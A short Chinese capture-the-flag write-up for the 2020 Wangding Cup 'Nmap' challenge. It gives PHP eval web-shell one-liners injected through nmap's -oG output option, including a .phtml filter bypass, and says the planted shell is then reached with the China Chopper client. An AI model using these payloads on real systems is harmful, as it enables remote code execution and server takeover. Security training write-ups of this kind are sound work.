[网鼎杯 2020 朱雀组]Nmap 1
1.介绍
1.1nmap使用
2.步骤
2.1使用nmap命令输入一句话进行保存。
' <?php @eval($_POST["hack"]);?> -oG hack.php '
2.2发现没有成功。使用phtml进行绕过
' <?= @eval($_POST["pd"]);?> -oG pd.phtml '
2.3访问,验证上传成功。
2.4使用菜刀进行链接,找到flag。
3.借鉴
(48条消息) [网鼎杯 2020 朱雀组]Nmap_浩歌已行的博客-CSDN博客
Charon的小Pluto的博客 (cnblogs.com)